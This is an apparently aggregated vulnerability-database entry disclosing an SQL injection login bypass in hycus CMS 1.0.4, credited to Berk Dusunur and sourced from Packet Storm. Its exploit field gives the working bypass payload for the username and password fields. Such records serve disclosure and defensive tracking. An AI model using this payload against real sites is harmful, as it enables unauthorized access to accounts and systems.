ID
VAR-E-201806-0320
TITLE
hycus CMS 1.0.4 SQL Injection
Trust: 0.5
sources:
PACKETSTORM: 148363
DESCRIPTION
hycus CMS version 1.0.4 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
Trust: 0.5
sources:
PACKETSTORM: 148363
AFFECTED PRODUCTS
vendor: | hycus | model: | cms | scope: | eq | version: | 1.0.4 | Trust: 0.5 |
sources:
PACKETSTORM: 148363
EXPLOIT
# Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass
# Google Dork:N/A
# Date: 28.06.2018
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://www.hycus.com/
# Software Link: http://demosite.center/hycus/
# Version: 1.0.4
# Tested on: Pardus / Debian Web Server
# CVE : N/A
#Proof Of Concept
use login bypass payload for username= '=' 'OR' for password= '=' 'OR'
Trust: 0.5
sources:
PACKETSTORM: 148363
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
sources:
PACKETSTORM: 148363
PRICE
free
Trust: 0.5
sources:
PACKETSTORM: 148363
TYPE
sql injection
Trust: 0.5
sources:
PACKETSTORM: 148363
TAGS
tag: | exploit | Trust: 0.5 |
tag: | remote | Trust: 0.5 |
tag: | sql injection | Trust: 0.5 |
sources:
PACKETSTORM: 148363
CREDITS
Berk Dusunur
Trust: 0.5
sources:
PACKETSTORM: 148363
EXTERNAL IDS
db: | PACKETSTORM | id: | 148363 | Trust: 0.5 |
sources:
PACKETSTORM: 148363
SOURCES
db: | PACKETSTORM | id: | 148363 |
LAST UPDATE DATE
2022-07-27T09:42:18.553000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 148363 | date: | 2018-06-28T13:33:33 |